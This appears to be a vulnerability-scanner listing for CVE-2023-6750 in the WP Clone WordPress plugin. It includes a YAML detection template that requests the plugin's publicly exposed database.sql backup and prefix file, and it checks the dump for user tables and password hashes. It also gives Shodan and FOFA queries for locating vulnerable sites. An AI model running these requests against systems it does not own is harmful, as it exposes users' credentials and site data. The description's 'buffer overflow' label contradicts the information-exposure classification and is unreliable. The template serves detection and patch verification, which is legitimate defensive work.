WordPress WP Clone <= 2.4.2 - Database Backup Exposure
CVE-2023-6750
Early Release
Description
Clone WordPress plugin < 2.4.3 contains a buffer overflow caused by storing in-progress backup information in publicly accessible buffer files at a static file path, letting attackers access sensitive backup data, exploit requires no special privileges
Severity
Critical
CVSS Score
9.8
Exploit Probability
1%
Affected Product
clone
Published Date
April 9, 2026
Template Author
pussycat0x
CVE-2023-6750.yaml
id: CVE-2023-6750
info:
name: WordPress WP Clone <= 2.4.2 - Database Backup Exposure
author: pussycat0x
severity: critical
description: |
Clone WordPress plugin < 2.4.3 contains a buffer overflow caused by storing in-progress backup information in publicly accessible buffer files at a static file path, letting attackers access sensitive backup data, exploit requires no special privileges
impact: |
Attackers can access sensitive backup information, potentially leading to data disclosure or manipulation.
remediation: |
Update to version 2.4.3 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-clone-by-wp-academy/clone-242-sensitive-information-exposure
- https://plugins.trac.wordpress.org/changeset/3012647/wp-clone-by-wp-academy
- https://nvd.nist.gov/vuln/detail/CVE-2023-6750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6750
epss-score: 0.00597
epss-percentile: 0.69383
cwe-id: CWE-200
cpe: cpe:2.3:a:developer:clone:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
product: clone
framework: wordpress
shodan-query: http.html:"wp-clone-by-wp-academy"
fofa-query: body="wp-clone-by-wp-academy"
tags: cve,cve2023,wp,wp-plugin,wordpress,wp-clone,backup
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/database.sql"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CREATE TABLE"
- "INSERT INTO"
condition: and
- type: word
part: body
words:
- "wp_users"
- "wp_options"
- "user_pass"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
name: db_table
part: body
group: 1
regex:
- "CREATE TABLE[^`]*`([^`]+)`"
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/wp-clone/wpclone_backup/prefix.txt"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "^[a-zA-Z0-9_]+$"
- type: status
status:
- 200
# digest: 4a0a004730450220427bf1af743ecc8bdeb372233279291a977b38dc14df37ba9c2105874a48f6910221008ba7cf8d8da5902f726828d0ad82773c530f35ed42e878dcc68c3c7f14feb523:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2023-6750
CWE ID:
cwe-200
Remediation Steps
Update to version 2.4.3 or later.